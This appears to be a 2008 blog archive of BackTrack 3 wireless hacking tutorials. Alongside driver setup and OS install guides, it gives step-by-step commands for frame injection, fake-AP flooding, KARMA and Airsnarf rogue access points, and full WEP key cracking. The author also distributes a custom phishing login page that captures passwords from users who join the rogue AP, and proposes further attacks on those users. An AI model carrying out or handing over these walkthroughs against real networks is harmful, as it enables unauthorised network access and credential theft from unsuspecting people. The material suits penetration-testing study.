Archive for July, 2008

Look for the wiki of backtrack HCL to know which cards are having rt73 chipset.

Tested on hardware Linksys WUSB54GC rt73 chipset based.

there is new update for rt73 chipset based cards.first download the latest modules.

working with wpa_supplicant.
you need to patch wpa_supplicant
use the next generation rt2x00 driver which is compatible with wpa_supplicant
latest modules of rt73 have in-built private ioctls to support wpa_supplicant like config.

Ok we begin
extract archive

ifconfig rausb0 down
modprobe -r rt73
cd rt73-k2wrlz-3.0.1/module
make && make install

modprobe rt73 ifname=rausb0 or wlan0
(here you can choose the appropriate name according to your choice like wlan0 or rausb0 or eth1 whatever)

now use the iwpriv command to avaliable private ioctls
iwpriv wlan0

bt ~ # iwpriv wlan0
wlan0 Available private ioctls :
set (8BE2) : set 1024 char & get 0
txpower (8BF3) : set 1024 char & get 1024 char
adhocOfdm (8BE6) : set 1 int & get 0
stat (8BE9) : set 1024 char & get 1024 char
get_site_survey (8BEF) : set 1024 char & get 1024 char
get_RaAP_Cfg (8BF1) : set 1024 char & get 0
forceprism (8BF2) : set 1024 char & get 0
rfmontx (8BEC) : set 1024 char & get 0
get_rfmontx (8BED) : set 0 & get 1 int
auth (8BE7) : set 1 int & get 0
enc (8BE8) : set 1 int & get 0
wpapsk (8BEA) : set 64 char & get 0
psm (8BEB) : set 1 int & get 0

you are able to see that we got options like txpower and wpapsk,auth,enc etc to modify the settings.

if you want to set the txpower output.use
ifconfig wlan0 down
modprobe -r rt73
modprobe rt73 txPowerTuning=36 ifname=wlan0
Remember: This value will be ADDED to the default Power stored in the card’s EEPROM!
Remember: This value will be ADDED to the default Power stored in the card’s EEPROM!
Valid Values for Transmit Power: -6 to 36 (0xFA to 0x24).
I set it on my Linksys WUSB54GC as 36 without problem.
now you can use

it will show the USB NIC interface as newly created wlan0

use airodump-ng wlan0

you will get pwr much more then before.I got amazingly 90 to 110.

now you have options to use and work with WPA/WPA2 networks.
first option as already told use latest rt2x00 drivers from serialmonkey or configure the wlan0 USB NIC as following

b) WPA (802.11g)

wpa_passphrase <essid> <passphrase>
copy the psk hash(uncommented one)
iwconfig wlan0 mode managed
iwpriv wlan0 set AuthMode=WPAPSK
iwpriv wlan0 set WPAPSK=<key> #replace key with your psk-hash
iwpriv wlan0 set EncrypType=TKIP

c) WPA2 (802.11i)
wpa_passphrase <essid> <passphrase>
copy the psk hash(uncommented one)
iwpriv wlan0 set AuthMode=WPA2PSK
iwpriv wlan0 set WPAPSK=<KEY> #replace key with your psk-hash
iwpriv wlan0 set EncrypType=AES

Check that you’re associated with an AP
iwconfig wlan0

if you want to patch wpa_supplicant for rt73 chipset you need to patch
the wpa_supplicant file to work with rt73 based chipset
download wpa_Supplicant & patch files here.


tar xzf wpa_supplicant-0.5.7.tar.gz
cd wpa_supplicant-0.5.7
patch -p1 < wpa_supplicant-ralink_rt73.patch
patch -p1 < wpa_supplicant-ralink_rt73-fix.patch
# install as usual, e.g.
cp wpa_cli wpa_supplicant /usr/local/bin

configure using wpa_supplicant(other users who looking for wpa_supplicant config. can try this)

use these commands

wpa_passphrase <essid> <passphrase>
bt ~ # wpa_passphrase thunderbolt backtrack3
psk=7b8e62496b86b7eba28199fd9af1f560a8503b7ede9149 bd2f42e42e631bedb0
copy the psk-hash

for configuring wpa_supplicant
nano /etc/wpa_supplicant.conf

edit it
# WPA protected network, supply your own ESSID and WPAPSK here:
scan_ssid=0 #1 is ssid is hidden
ssid=”thunderbolt” #change with your ssid/essid
pairwise=CCMP TKIP
group=CCMP TKIP WEP104 WEP40
psk=7b8e62496b86b7eba28199fd9af1f560a8503b7ede9149 bd2f42e42e631bedb0
# change the psk hash with your psk hash you got from wpa_passphrase

now connect with WPA/WPA2 enable AP using

bt ~ # wpa_supplicant -i wlan0 -c /etc/wpa_supplicant.conf – d rt73 -w (other user may change to ath0,wifi0)

Trying to associate with 00:21:29:68:16:c2 (SSID=’thunderbolt’ freq=2462 MHz)

Associated with 00:21:29:68:16:c2
WPA: Key negotiation completed with 00:21:29:68:16:c2 [PTK=TKIP GTK=TKIP]
CTRL-EVENT-CONNECTED – Connection to 00:21:29:68:16:c2 completed (auth) [id=0 id_str=]

Here you done configuring txpower for new rt73 module,configuring wpa/wpa2.hope you all liked this little hardware hacks and configs.

Wifitap is a proof of concept for communication over WiFi networks using traffic injection.
Direct communication without association

Wifitap allows direct communication with an associated station to a given access point directly, meaning:

* not being associated ourselves;
* not being handled by access point.

airmon-ng start ath0
airmon-ng start wifi0
airmon-ng start wifi0
(Now you have 3 ath interface.ath0,ath1,ath2)

airodump-ng ath1
Note the BSSID of your AP.
Wifitap is ready to be launched to communicate with reachable associated stations to access point

goto /pentest/wireless/wifitap

modprobe tun (we need this tunnel interface to inject frames)

bt wifitap# -b 00:21:29:68:16:C2 -o ath2 -i ath2
(Launching Wifitap creates an tuntap interface named wj0 through which we can inject regular IP traffic)

assign an IP address to the wjo interface
bt~#ifconfig wj0 (Most of the routers work in 192.168.1.X segment so you can use safely any IP except,, etc.)

Now we can reach through wj0. now start listening on ath2 interface we can discover associated stations and communicate with them with IP.

bt~#tcpdump -vvv -i ath2

NB : wj0 MAC address is used as source for sent frames if you don’t provide source MAC address using -s <SMAC>

bt ~ # route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags  Metric Ref     Use    Iface   U      0         0           0      eth0   U      0         0           0      wj0          U      0         0           0       lo             UG     0        0           0       eth0

bt ~ # ping
PING ( 56(84) bytes of data.
64 bytes from icmp_seq=1 ttl=64 time=0.045 ms
64 bytes from icmp_seq=2 ttl=64 time=0.036 ms
64 bytes from icmp_seq=3 ttl=64 time=0.035 ms
64 bytes from icmp_seq=4 ttl=64 time=0.040 ms

— ping statistics —
4 packets transmitted, 4 received, 0% packet loss, time 2997ms
rtt min/avg/max/mdev = 0.035/0.039/0.045/0.004 ms

you have successfully setup a connection with router.Wifitap allows any application do send and receive IP packets using 802.11 traffic capture and injection over a WiFi network simply configuring wj0, which means :

* setting an IP address consistent with target network address range ;
* routing desired traffic through it.

In particular, it’s a cheap method for arbitrary packets injection in 802.11 frames without specific library.

In addition, it will allow one to get rid of any limitation set at access point level, such as bypassing inter-client communications prevention systems (e.g. Cisco PSPF) or reaching multiple SSID handled by the same access point.
Wifitap can easily be modified to be used as a framework for simple tasks such as injecting answers to captured frames.

If you want to use Scapy for captured packets parsing and answers generation, it is necessary to add import for related classes. For instance, if you want to work on ICMP packets, just add:

from scapy  import IP,ICMP

Then, you have to rip tuntap interface handling:

* initialisation;
* reading;
* writting.

Finally, you have to modify the main loop to handle interesting frames identification, fields parsing, then answers generation and injection.

Wifitap contains sample programs:

* ARP requests answering machine (;
* DNS requests answering machine (
* ICMP Echo Requests answering machine (;

As I got the script working with my card, I noticed that it was quite effective at throwing a lot of trash onto the 802.11 spectrum. You could quickly fill up a Netstumbler, Kismet or Airodump screen with random stuff. However, if the purpose was to make it appear as if the area was filled with access points


* A card working with the MadWifi drivers. There are some specific commands (wlanconfig) that will need to be changed if you are going to hack this for other cards/drivers.
* A card that supports Master or AP mode. This allows it to function or appear as an access point to wireless clients.
* The Time::HiRes Perl module. [OPTIONAL] This is available from CPAN and allows you to specify sleep times in sub-second increments. Not needed if you are happy with whole second delays.
* The Getopt::Long Perl module. This is available from CPAN and is required for processing of command line arguments passed to airraid.
* macchanger. This is a very handy little utility. It is available here or from various other places. There are many binaries already compiled. It is required to effectively change the MAC address of the wireless card.
* Linux or some form of *nix. Of course.
* Root (superuser) access. I don’t know this for a fact but I suspect you need to be root to manipulate some of the ifconfig and iwconfig commands.

goto /pentest/wireless/airraid-0.1/
make some modifications to groupfile-example.dat and put some of AP details in following manner
bssid,essid,WEP y/n,channel
for example I entered

save and close it


edit my @words= put these strings in end.its random generation of ESSID’s.
my @words = ( “Access Point”, “tsunami”, “host”, “airport”, “linksys”, “Netgear”, “Cisco”, “Wireless”, “2wire”, “intel”, “WLAN” , “thunderbolt” , “UTStarcom” , “beetel” , “Ubiquiti”, “wifi0wn” , “PRAVEEN”); –interface ath0

This is about as simple as you can go. This will generate fully random (wireless) MAC addresses, no WEP (open), full power, use a random assortment of the built-in default ESSIDs, sleep for the default (0.6 sec) between generations, and use all available channels. The MACs will, in all likelihood, almost never be repeated so any scanners will see a nearly infinite number of APs if they watch long enough.For testing it I monitored using another wireless interface.

bt~#airodump rausb0
(Check that all the FakeAP is having encryption type OPN)

bt~#airodump rausb0
(Check that all the FakeAP is having encryption type OPN) –interface ath0 –power 20 –wep 1

This one creates a bit more variety on the airwaves. This will generate fully random (wireless) MAC addresses, randomly assign WEP keys to all of the APs, vary power between 0 mW and 20 mw (or the max of the card), use a random assortment of the built-in default ESSIDs and use all available channels. Similar to the example above, this will create a nearly infinite number of APs.For testing it use

bt~#airodump-ng rausb0
(Check all the FakeAP’s now showing encryption type as WEP) –interface ath0 –power 20 –gf groupfile-example.dat

My personal favorite. This will vary power between 0 mW and 20 mw (or the max of the card) but pull all other information from the groupfile called groupfile-example.dat which contains all the information necessary to create n bogus APs. This will cycle through these n APs in random order, sending out beacons.

bt~#airodump-ng rausb0
(Check that FakeAP is throwing Becons randomly & acting as Real AP like.)


Project homepage:

“KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targeted by creating a Rogue AP for one of their probed networks (which they may join automatically) or using a custom driver that responds to probes and association requests for any SSID.  Higher-level fake services can then capture credentials or exploit client-side vulnerabilities on the host.” -

first of all install the latest madwifi snapshots here

bt ~#tar -zxvf madwifi-trunk-r3813-20080720.tar.gz

bt ~#cd madwifi-trunk-r3813-20080720

bt ~#make && make install

bt ~ # ln -s  /sbin/iwconfig  /usr/sbin/iwconfig
bt ~# ln -s  /sbin/iwpriv  /usr/sbin/iwpriv
bt ~#  ln -s  /sbin/iwevent  /usr/sbin/iwevent
bt ~# airmon-ng start ath0
bt ~#airmon-ng start wifi0

Putting the card into monitor mode

bt ~#wlanconfig ath0 destroy

bt ~#wlanconfig ath0 create wlandev wifi0 wlanmode master

goto karma directory

karma.xml “Runs a rogue base station with DHCP, DNS and HTTP services.  The HTTP service re-directs all requests to the ExampleWebExploit module that displays a simple HTML page.  This page can be replaced with something that informs the user that their wireless settings are insecure and that it may be a violation of corporate policy etc” -

bt karma#bin/ ath0

bt karma#(cd ./src/ && make) && ./src/karma ath0

bt karma#

bt karma#bin/karma  etc/karma.xml

Now the rogue services are started any probing clients will now connect to KARMA on our machine whichever SSID their machine chooses to use.

Iwconfig output showing ath0 working as RogueAP.we can see bssid of RogueAP

We can see our FakeAP is working now and broadcasting BSSID & other clients probing for legitimate AP automatically connects with our rogueAP

karma-scan.xml – “Attempts to find insecure wireless clients that will associate to rouge network and possibly obtain IP address via DHCP”. -

bt karma#bin/karma etc/karma-scan.xml


This tool have layer attack approach.I am still working on it so that we can lauch more attack like Nmap scanning and metasploit for exploit the known vulnerabilites.

Most probably you people wont be trsuting the point that a Linux machine can act as a Access-point but its true.Atheros chipset based cards can act as Access-point or Master mode.for checking that your card support to act as an AP.I have tested it on Backtrack3 final.Using Netgear WG311T A/G/N AR 2414 Chipset
(patched madwifi-ng drivers) with 7 dbi Antenna & Linksys WUSB54GC (RT73 chipset).Netgear PCI Card I made as Rogue AP & Through my other card I Scanned the avaliable AP and got the Rogue Ap Working in OPN Authentication mode.voila
use this command to verify your card about Airsnarf specifications:-

wlanconfig ath0 create wlandev wifi0 wlanmode master/ap    #use either master or ap

this command makes an WIRELSS NIC acting as AP.

I have attached a custom coded file which makes airsnarf a truly immersive Legitimate looking it and Unzip it.DOWNLOAD

#replace  the file  airsnarf.cfg with /pentest/wireless/airsnarf-0.2/cfg/airsnarf.cfg

#For wireless interace I would recommend Atheros Chipset based cards as the airsnarf
tries to make NIC card as Access point which is possible using MADWIFI-NG drivers only
and those are atheros based chipset.

#place dhcpd.src /pentest/wireless/airsnarf-0.2/bin

#replace airsnarf.cgi with /pentest/wireless/airsnarf-0.2/cfg/cgi-bin/airsnarf.cgi

#replace my index.html in path /pentest/wireless/airsnarf-0.2/cfg/html & /var/www/htdocs

#replace airsnarf.jpg with my airsnarf.jpg in /pentest/wireless/airsnarf-0.2/cfg/html & /var/www/htdocs

#copy apache_pb22_ani.gif from /var/www/htdocs & paste in /pentest/wireless/airsnarf-0.2/cfg/html.

#that is all we have done.made a legally looking webpage for login.

#cd /pentest/wireless/airsnarf-0.2 airsnarf0.2
(paswords will be store in /tmp/airsnarf_pwds.txt)

Setting the ROGUE AP name as Wifi0wn & DHCP Network ID And Router IP.

Starting the Airsnarf Script to Work As Rogue AP.Great tool for showing the vulnerabilites in Windows Connection manager.

With my another USB Wireless NIC linksys WUSB54GC I am scanning the avaliable network.where I can see my fake AP is Also getting work by name wifi0wn with open authentication,54 Mbps and on channel 1.

now with my other card I am trying to get an IP from wifi0wn and connect without any key.

You can see that ath0 is working as an Access-point having random MAC ID and my rausb0/linksys adapter got connected with Rogue AP.

In ifconfig we can see that rausb0 got IP address from the ROGUE DHCP Server of Airsnarf

Now when you will surf you will get such login-page which is totally legitimate look.thanks to me to code it and redirecting it.

Redirection of url after hacking username & Password.

Default location of password is /tmp/airsnarf_pwds.txt.

List of username along with passwords

This tool is still in progress.I am making it to work more worsely like redirecting to some website,XSS.use it for social-engineering and vulnerability assessment you can show that anaware user can connect to fakeAP without their knowledge and which can leads to compromise their data.once connecting with AP now you can run the Nmap Scan along with Metapsloit Framework,sniffers like wireshark for getting HTTP,HTTPS,FTP,TELNET Passwords & Many more sofisticated attacks.(USE FOR PT & VA Only)

What is the no client is associated with AP and you are getting no more data packets.In such cases Deauth does not here is how to do the attack

airodump-ng wifi0
#copy bssid of the AP and press ctrl+c
airodump-ng -c 11 -w thunderbolt –bssid 00:21:29:68:16:C2 rausb0
#-c channel on which AP is working
#-w writing captured data
#–bssid MAC of AP
#wireless device-name like atho,wifi0,wlan0,rausb0,eth0

keep this window running and open new terminal

aireplay-ng -1 0 -e thunderbolt -a 00:21:29:68:16:C2 -h 00:21:29:65:38:42 rausb0

#-e essid is Extensible Service Set Identifier or AP Hostname

#-h MAC of Wireless Device

Got Authenticated & Association with AP

aireplay-ng -4 -h 00:21:29:65:38:42 -b 00:21:29:68:16:C2 rausb0

#-4 Arp Replay attack of Aireplay-ng

#-h MAC Address of wireless

#-b bssid or MAC of AP

Arp Replay attack in action see the AP.the data packets are increasing superfastly.wonderfull

Copy the XOR filename after this command fully executed

packetforge-ng -0 -a 00:21:29:68:16:C2 -h 00:21:29:65:38:42 -k -l -y replay123456.xor -w arp-request

#use packetforge-ng to make the XOR file usable to cracking into aircrack-ng

aireplay-ng -2 -h 00:21:29:65:38:42 -r arp-request rausb0

#save the reply in capture file for later cracking in aircrack-ng

aircrack-ng -n 128 -z -f 1 -e thunderbolt -b 00:21:29:68:16:C2 thunderbolt*.cap

#-n number of WEP bits key applied.ex. 64,128,256 bit

#cap capture file which we mentioned in airodump command.

We got the key decrypted 100% correctly

after several days study and installation I made final documentation of comprehensive installation of BackTrack 3 DVD installation and Conflict free dual booting.I assume you have already made DVD ISO using make_iso.bat or using linux shell script file and burned the DVD ISO on DVD I am already having separate partition for linux which I created previously having size can provide free space for partition using any windows utility like paragon partition manager.I proceed further-

BackTrack 3 DVD Installation On Hard-Disk

boot BackTrack 3 using ISO DVD

First after booting KDE 3.5
click KDE menu
System Information
Storage Device
here you will get list of all mounted devices
for a hazel free installation it is necessary that you unmount all the physical partitions because by default after booting using live DVD backtrack will mount all partitions.

Choose partition
right click
(repeat steps for all physical mounted partitions)

For E.G my Hard-Disk Partition Table Is:

Now you got a rough idea which all partitions are to be unmounted(e.g.hdc1,hda7,hda5,hda6,hda1,hdc5)

hda-first hard-disk
hdc-second hard-disk

I am assuming you are using hdc

open xterm
bt~#fdisk /dev/hdc

p (view partition table)

n (create new partition at this point if you getting error no free sectors delete one of partition(warning:all data would be lost on that partition))

p (primary)

1 (partition 1)


+4200M (size for partition one.its root.storing files,downloaded data)

n (new partition)

p (primary)



+64M (it would be our boot partition)

n (new partition)

p (primary)



+522M (swap partition,double the amount of system RAM)

p (newly created partition table)

t (table for changing system partition id)

3 (that is our swap partition.def set to 83)

82 (making hdc3 partition as swap by changing its id from 83 to 82)

p (check partition table)

w (save changes)
(at this point if you getting warning:error 16 Device or Resource partition table would come into effect after next restart then REBOOT.)

bt~#reboot (fdisk recommend this)

bt~#mke2fs /dev/hdc2
bt~#mkswap /dev/hdc3
bt~#swapon /dev/hdc3
bt~#mkreiserfs /dev/hdc1
choose (y/n)y
bt~#mkdir /mnt/backtrack
bt~#mount /dev/hdc1 /mnt/backtrack
bt~#mkdir /mnt/backtrack/boot
bt~#mount /dev/hdc2 /mnt/backtrack/boot
bt~#cp –preserve -R /{bin,dev,home,pentest,root,usr,etc,lib,opt,sbin,sr v,var} /mnt/backtrack
bt~#mkdir /mnt/backtrack{mnt,proc,sys,tmp}
bt~#mount –bind /dev /mnt/backtrack/dev
bt~#mount -t proc proc /mnt/backtrack/proc
(at this point you can get error about directory not exist,may be its a bug that even after running aboce mkdir cmd the directory has not been created.go to backtrack directory and make directories by mkdir{mnt,proc,sys,tmp} here you are)
bt~#cp /boot/vmlinuz /mnt/backtrack/boot
bt~#chroot /mnt/backtrack /bin/bash
bt~#nano /etc/lilo.conf

Configure LILO(find & change following configs)
boot = /dev/hda (for knowing which is your boot-disk use fdisk /dev/devicename(e.g./dev/hda or /dev/hdc the one which showing an start * is your boot partition)

timeout=1200 (timeout for LILO boot menu option)

#linux config …
image = /boot/vmlinuz
root = /dev/hdc1 (this is your root partition,the biggest one you created)
label= BaCkTrAcK3(I33t)
other = /dev/hda1
label = WindowsOs(n00b) (here comes ms n00b O.S full with bugs lol)
table = /dev/hda (disk where your Microsoft OS Resides)

save using ctrl + o & press enter
come out using ctrl + x
bt~/#cd \
bt~#lilo -v (remember its very important step to tell lilo which operating system is to be add in lilo boot loader list.if it goes well you have successfully installed the BackTrack 3 DVD version on your hard-disk along with Microsoft OS Dual Booting)
bt~#init 6
Installation of BT 3 on Vmware
I got tutorial on BT3 installation on Vmware.Thanks to respective member.I am modifying it a little to make more comprehensive

tested using Vmware workstation 6.0.0 build-45371
guest os-Linux
version-Other linux 2.6 kernel
networking-choose bridged or NAT
Disk capacity-recommended 7-8GB
now edit settings for this VM
memory-128(if system RAM=256MB)
192/256(if system RAM=512MB)
cdrom-if using ISO DVD using Hard-disk.choose location else default DVD ISO.

boot BT3
open xterm
bt~#fdisk /dev/sda

(at this point if you getting warning:error 16 Device or Resource partition table would come into effect after next restart then REBOOT.)
bt~#init 6
bt~#mkfs.ext3 /dev/sda1
bt~#mkswap /dev/sda2
bt~#mkdir /mnt/backtrack
bt~#mount /dev/sda1 /mnt/backtrack

goto KDE menu->backtrack->Install Backtrack(Not tested)
Source(Backtrack CD):
Install backtrack to:/mnt/backtrack
Write new MBR(lilo.mbr)to:/dev/sda
Installation method:Real
Uncheck-Restore orignal MBR after lilo (its very imp to UNCHECK this else your whole hard work will go in vain)
Press Install
hang out outside thinking how many tools your are going to work over on BT3 for about 30-40 mins.
after installation
Reboot using KDE menu->logoff->Reboot